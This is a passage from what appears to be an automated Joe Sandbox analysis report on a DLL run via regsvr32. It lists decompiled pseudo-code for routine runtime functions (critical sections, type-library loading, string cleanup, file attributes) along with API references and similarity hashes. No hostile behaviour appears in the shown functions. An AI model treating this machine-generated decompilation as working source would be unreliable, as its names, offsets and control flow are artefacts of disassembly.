						if( *((intOrPtr*)( *__ecx + 0x24))() < 0) {
							GetModuleFileNameA( *(E10064B8B() + 8),  &_v276, 0x104);
							if( &_v276 != 0) {
								_t83 = lstrlenA( &_v276) + 1;
								E1001B2B0(_t83 + _t83 + 0x00000003 & 0x000000fc,  &_v276);
								_t80 = _t84;
								 *_t80 = 0;
								MultiByteToWideChar(0, 0,  &_v276, 0xffffffff, _t80, _t83);
							}
							_t58 =  &_v8;
							__imp__#161(_t80, _t58);
							if(_t58 < 0) {
								_v8 = _v8 & 0x00000000;
							}
						}
						E10019DBD(_v12, _a4, _v8);
					}
					_t44 = _v8;
					if(_t44 != 0) {
						_v16 =  *((intOrPtr*)( *_t44 + 0x18))(_t44, _a8, _t67);
						_t48 = _v8;
						 *((intOrPtr*)( *_t48 + 8))(_t48);
						E10019E51(_v12, _a4, _a8,  *_t67);
					}
				} else {
					_v16 = 0;
				}
				E10064D48(0xd);
				return _v16;
			}

0x10019b58
0x10019b61
0x10019b68
0x10019b6b
0x10019b71
0x10019b76
0x10019b79
0x10019b86
0x10019ba1
0x10019bac
0x10019baf
0x10019bb7
0x10019bce
0x10019bdc
0x10019bed
0x10019bf6
0x10019bfb
0x10019c0c
0x10019c0f
0x10019c0f
0x10019c15
0x10019c1a
0x10019c22
0x10019c24
0x10019c24
0x10019c22
0x10019c31
0x10019c31
0x10019c36
0x10019c3b
0x10019c47
0x10019c4a
0x10019c50
0x10019c5e
0x10019c5e
0x10019b88
0x10019b88
0x10019b88
0x10019c65
0x10019c77

APIs

Part of subcall function 10064CD8: EnterCriticalSection.KERNEL32(10094960,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D13
Part of subcall function 10064CD8: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D25
Part of subcall function 10064CD8: LeaveCriticalSection.KERNEL32(10094960,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D2E
Part of subcall function 10064CD8: EnterCriticalSection.KERNEL32(00000000,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6,10041F16), ref: 10064D40

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10019BCE
lstrlenA.KERNEL32(?), ref: 10019BE5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 10019C0F
LoadTypeLib.OLEAUT32(00000000,?), ref: 10019C1A

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$ByteCharFileInitializeLeaveLoadModuleMultiNameTypeWidelstrlen
String ID:
API String ID: 2250146134-0
Opcode ID: e3d8268fde5dd7f1bcff4b0da5a51c4e03f82de944466049b10d118376e8a4e4
Instruction ID: 527c9733fd9e9c99d7ace1064f4639bed0ad0dd4a4638ee77f27418b4f57cc05
Opcode Fuzzy Hash: e3d8268fde5dd7f1bcff4b0da5a51c4e03f82de944466049b10d118376e8a4e4
Instruction Fuzzy Hash: 50415675A00109AFDF14CFA4C885EEEBBB9FF48354F114099F9199B251DB70EA81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10028741 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E10028741() {
				signed int* _t35;
				signed int* _t39;
				signed int _t47;
				struct _CRITICAL_SECTION* _t49;
				signed int** _t53;
				signed int _t55;
				signed int* _t58;
				signed int _t61;
				signed int _t62;
				signed int* _t64;
				signed int** _t66;
				void* _t67;

				_t62 = _t61 | 0xffffffff;
				E1001F3A0(0x12);
				_t47 = 0;
				 *(_t67 + 0x10) = 0;
				 *((intOrPtr*)(_t67 + 0x14)) = 0;
				_t66 = 0x10095300;
				while(1) {
					_t64 =  *_t66;
					if(_t64 == 0) {
						break;
					}
					_t39 =  &(_t64[0x120]);
					while(_t64 < _t39) {
						if((_t64[1] & 0x00000001) != 0) {
							L11:
							_t64 =  &(_t64[9]);
							_t39 =  &(( *_t66)[0x120]);
							continue;
						} else {
							if(_t64[2] == 0) {
								E1001F3A0(0x11);
								if(_t64[2] == 0) {
									InitializeCriticalSection( &(_t64[3]));
									_t64[2] = _t64[2] + 1;
								}
								E1001F401(0x11);
							}
							_t49 =  &(_t64[3]);
							EnterCriticalSection(_t49);
							if((_t64[1] & 0x00000001) == 0) {
								 *_t64 =  *_t64 | 0xffffffff;
								_t55 = 0x24;
								asm("cdq");
								_t62 = (_t64 -  *_t66) / _t55 +  *((intOrPtr*)(_t67 + 0x14));
								if(_t62 == 0xffffffff) {
									_t47 =  *(_t67 + 0x10);
									break;
								}
							} else {
								LeaveCriticalSection(_t49);
								_t47 =  *(_t67 + 0x10);
								goto L11;
							}
						}
						L21:
						E1001F401(0x12);
						return _t62;
					}
					 *((intOrPtr*)(_t67 + 0x14)) =  *((intOrPtr*)(_t67 + 0x14)) + 0x20;
					_t66 =  &(_t66[1]);
					_t47 = _t47 + 1;
					 *(_t67 + 0x10) = _t47;
					if(_t66 < 0x10095400) {
						continue;
					} else {
					}
					goto L21;
				}
				_t35 = E1001A76A(0x480);
				if(_t35 != 0) {
					 *0x1009543c =  *0x1009543c + 0x20;
					_t53 =  &(0x10095300[_t47]);
					_t28 =  &(_t35[0x120]); // 0x480
					_t58 = _t28;
					 *_t53 = _t35;
					while(_t35 < _t58) {
						_t35[1] = _t35[1] & 0x00000000;
						 *_t35 =  *_t35 | 0xffffffff;
						_t35[2] = _t35[2] & 0x00000000;
						_t35[1] = 0xa;
						_t35 =  &(_t35[9]);
						_t58 =  &(( *_t53)[0x120]);
					}
					_t62 = _t47 << 5;
					E10028A48(_t62);
				}
				goto L21;
			}

0x10028749
0x1002874c
0x10028751
0x10028754
0x10028758
0x1002875c
0x10028761
0x10028761
0x10028766
0x00000000
0x00000000
0x1002876c
0x10028772
0x1002877a
0x100287c0
0x100287c3
0x100287c6
0x00000000
0x1002877c
0x10028780
0x10028784
0x1002878e
0x10028794
0x1002879a
0x1002879a
0x1002879f
0x100287a4
0x100287a5
0x100287a9
0x100287b3
0x100287cd
0x100287d7
0x100287d8
0x100287dd
0x100287e4
0x100287e6
0x00000000
0x100287e6
0x100287b5
0x100287b6
0x100287bc
0x00000000
0x100287bc
0x100287b3
0x10028853
0x10028855
0x10028863
0x10028863
0x100287ea
0x100287ef
0x100287f2
0x100287f9
0x100287fd
0x00000000
0x00000000
0x10028803
0x00000000
0x100287fd
0x1002880b
0x10028813
0x10028815
0x1002881c
0x10028823
0x10028823
0x10028829
0x1002882b
0x1002882f
0x10028833
0x10028836
0x1002883a
0x10028840
0x10028843
0x10028843
0x1002884a
0x1002884d
0x10028852
0x00000000

APIs

Part of subcall function 1001F3A0: InitializeCriticalSection.KERNEL32(00000000,?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3DD
Part of subcall function 1001F3A0: EnterCriticalSection.KERNEL32(?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3F8

InitializeCriticalSection.KERNEL32(00000080,?,?,?,00000000,?,?,100289F6), ref: 10028794
EnterCriticalSection.KERNEL32(00000080,?,?,?,00000000,?,?,100289F6), ref: 100287A9
LeaveCriticalSection.KERNEL32(00000080,?,?,?,00000000,?,?,100289F6), ref: 100287B6

Strings

, xrefs: 100287EA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-3916222277
Opcode ID: 3b028d6a0b64b006071af18bb597c36fa50b1b816345879e5dedb36f68ae2d13
Instruction ID: 23eefc438509c08342b0e2ee5be87820662a0c06ebd83162f81b68d2e1f4f189
Opcode Fuzzy Hash: 3b028d6a0b64b006071af18bb597c36fa50b1b816345879e5dedb36f68ae2d13
Instruction Fuzzy Hash: D231467650A3518FE304CF24ECC4B4A77D0EF40325FA58A2EF5694B1D1DBB1EA848751

Uniqueness

Uniqueness Score: -1.00%

Function 10012956 Relevance: 6.1, APIs: 4, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E10012956(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr* _t43;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr* _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t70;

				_t70 = _a4 - 0xc8;
				if( *((intOrPtr*)(_t70 + 0xa0)) != 0) {
					L13:
					return 0;
				}
				_t59 = _a8;
				if( *((intOrPtr*)(_t70 + 0x88)) != 0) {
					L3:
					if( *((intOrPtr*)(_t70 + 0x94)) == _t59) {
						__imp__#9(_t70 + 0xa8);
						_t43 =  *((intOrPtr*)(_t70 + 0x4c));
						_a4 = 0;
						_push( &_a4);
						_push(0x10081330);
						_push(_t43);
						if( *((intOrPtr*)( *_t43))() >= 0) {
							E1001AB60( &_v56, 0, 0x20);
							E1001AB60( &_v24, 0, 0x10);
							_t49 = _a4;
							_t50 =  *((intOrPtr*)( *_t49 + 0x18))(_t49, _t59, 0x10081390, 0, 2,  &_v24, _t70 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t50;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t51 = _a4;
							 *((intOrPtr*)( *_t51 + 8))(_t51);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t70 + 0xa4)) = 1;
							}
						}
					}
					goto L13;
				}
				_v60 = 2;
				_v56 = _t59;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				E10011B7F(_t70,  &_v60);
				_t58 = _v36;
				if(_t58 != 0) {
					return _t58;
				}
				goto L3;
			}

0x10012962
0x10012970
0x10012a63
0x00000000
0x10012a63
0x1001297c
0x1001297f
0x100129b3
0x100129b9
0x100129c6
0x100129cc
0x100129d2
0x100129d5
0x100129d8
0x100129dd
0x100129e2
0x100129eb
0x100129f7
0x10012a02
0x10012a21
0x10012a27
0x10012a2d
0x10012a30
0x10012a35
0x10012a35
0x10012a3a
0x10012a3f
0x10012a3f
0x10012a44
0x10012a49
0x10012a49
0x10012a4b
0x10012a51
0x10012a57
0x10012a59
0x10012a59
0x10012a57
0x100129e2
0x00000000
0x100129b9
0x10012987
0x1001298e
0x10012991
0x10012994
0x10012997
0x1001299a
0x1001299d
0x100129a0
0x100129a3
0x100129a8
0x100129ad
0x10012a69
0x10012a69
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 100129C6
SysFreeString.OLEAUT32(?), ref: 10012A35
SysFreeString.OLEAUT32(?), ref: 10012A3F
SysFreeString.OLEAUT32(?), ref: 10012A49

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 4363d17d997903d50c7d0126a5c4a7043358d131f5e43bbac9c41eac63ff98da
Instruction ID: a419fe7004dac0b6109d0e74c4ec49f62da3ea526096db3f7badea4d14526c91
Opcode Fuzzy Hash: 4363d17d997903d50c7d0126a5c4a7043358d131f5e43bbac9c41eac63ff98da
Instruction Fuzzy Hash: 6C314CB5E00219BFCB14DFA4C884ECEBBB8FF08750F40801AF519AA150D770AA94CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10046210 Relevance: 6.1, APIs: 4, Instructions: 85
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10046210() {
				intOrPtr _t42;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t49;
				void* _t50;
				intOrPtr _t55;
				void* _t60;
				intOrPtr* _t74;
				intOrPtr* _t77;
				void* _t80;
				void* _t82;

				E1001A9E0(0x10076998, _t80);
				_t74 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x48;
				_t77 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t80 - 0x14)) = _t77;
				E10041B57(_t80 - 0x50);
				 *(_t80 - 4) = 0;
				 *(_t80 - 4) = 1;
				 *((intOrPtr*)(E100648FB() + 4)) =  *((intOrPtr*)( *_t74 + 4));
				_t10 = E10064B8B() + 0x1070; // 0x1070
				 *((intOrPtr*)(E100655E1(_t10, E100631AC) + 4)) = _t77;
				E10046478();
				_t42 =  *((intOrPtr*)(E10064B8B() + 4));
				if(_t42 != 0 &&  *((intOrPtr*)(_t77 + 0x1c)) == 0) {
					_t55 =  *((intOrPtr*)(_t42 + 0x1c));
					if(_t55 != 0 &&  *((intOrPtr*)(_t55 + 0x1c)) != 0) {
						E10041FBD(_t80 - 0x50,  *((intOrPtr*)(_t55 + 0x1c)));
						 *((intOrPtr*)(_t77 + 0x1c)) = _t80 - 0x50;
					}
				}
				 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
				_t60 =  *(_t74 + 0x14);
				SetEvent( *(_t74 + 0x10));
				WaitForSingleObject(_t60, 0xffffffff);
				CloseHandle(_t60);
				_t46 =  *((intOrPtr*)(_t77 + 0x50));
				if(_t46 == 0) {
					_t48 =  *((intOrPtr*)( *_t77 + 0x50))();
					_t49 =  *_t77;
					if(_t48 != 0) {
						_t50 =  *((intOrPtr*)(_t49 + 0x54))();
					} else {
						_t50 =  *((intOrPtr*)(_t49 + 0x68))();
					}
				} else {
					_t50 =  *_t46( *((intOrPtr*)(_t77 + 0x4c)));
				}
				E10041FF6(_t80 - 0x50);
				_push(1);
				E10046433(_t50);
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				E10042632(_t80 - 0x50);
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return 0;
			}

0x10046215
0x10046220
0x10046226
0x10046229
0x1004622c
0x1004622f
0x10046236
0x10046239
0x10046247
0x10046254
0x1004625f
0x10046262
0x1004626c
0x10046271
0x10046278
0x1004627d
0x1004628a
0x10046292
0x10046292
0x1004627d
0x100462ca
0x100462ce
0x100462d1
0x100462da
0x100462e1
0x100462e7
0x100462ec
0x100462fa
0x100462ff
0x10046303
0x1004630a
0x10046305
0x10046305
0x10046305
0x100462ee
0x100462f1
0x100462f3
0x10046312
0x10046317
0x1004631a
0x1004631f
0x10046326
0x10046332
0x1004633b

APIs

__EH_prolog.LIBCMT ref: 10046215

Part of subcall function 100655E1: TlsGetValue.KERNEL32 ref: 10065620

Part of subcall function 10046478: GetCurrentThreadId.KERNEL32(?,10046267,100631AC), ref: 1004648B
Part of subcall function 10046478: SetWindowsHookExA.USER32(000000FF,10046922,00000000,00000000), ref: 1004649B

SetEvent.KERNEL32(?,100631AC), ref: 100462D1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 100462DA
CloseHandle.KERNEL32(?), ref: 100462E1

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCurrentEventH_prologHandleHookObjectSingleThreadValueWaitWindows
String ID:
API String ID: 3726718227-0
Opcode ID: fd84330712e542a9c4bfb1c9d02ecf69e9990b5a6397fa6c5ba9bb17f942fc92
Instruction ID: b2ff2cf208ea8c33f5687b2b31675e4c93c989da7d0a69fe7f5a846ec3f0aeb6
Opcode Fuzzy Hash: fd84330712e542a9c4bfb1c9d02ecf69e9990b5a6397fa6c5ba9bb17f942fc92
Instruction Fuzzy Hash: 3A31BA34A00612EFCB18DFA4CD8598DBBB1FF08350B218539E402D7292EB70FA09CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1004921D Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004921D(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E1001AB60(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x10049219
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E10037F21( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E10037F21( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E10037F21( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

0x10049225
0x10049230
0x10049233
0x1004923b
0x10049247
0x1004924d
0x10049250
0x10049255
0x100492ed
0x100492ef
0x00000000
0x100492ef
0x10049270
0x10049284
0x00000000
0x10049284
0x10049277
0x1004927f
0x10049282
0x10049288
0x1004928f
0x10049298
0x100492a0
0x00000000
0x00000000
0x100492a2
0x100492a5
0x100492b5
0x100492c6
0x100492d5
0x100492d7
0x100492dd
0x100492df
0x100492df
0x100492e5
0x100492e7
0x100492ea
0x100492ea
0x00000000
0x100492e5
0x10049291
0x10049291
0x00000000
0x10049291
0x00000000

APIs

lstrcpynA.KERNEL32(10049219,?,00000104,?,?,?,?,?,?,?,10049207,?), ref: 10049247
GetFileTime.KERNEL32(00000000,10049207,?,?,?,?,?,?,?,?,?,10049207,?), ref: 10049268
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,10049207,?), ref: 10049277
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,10049207,?), ref: 10049298

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: 1eead9d3d03242078f237fd557833f643aded1042b9e5545cf348de1b444caac
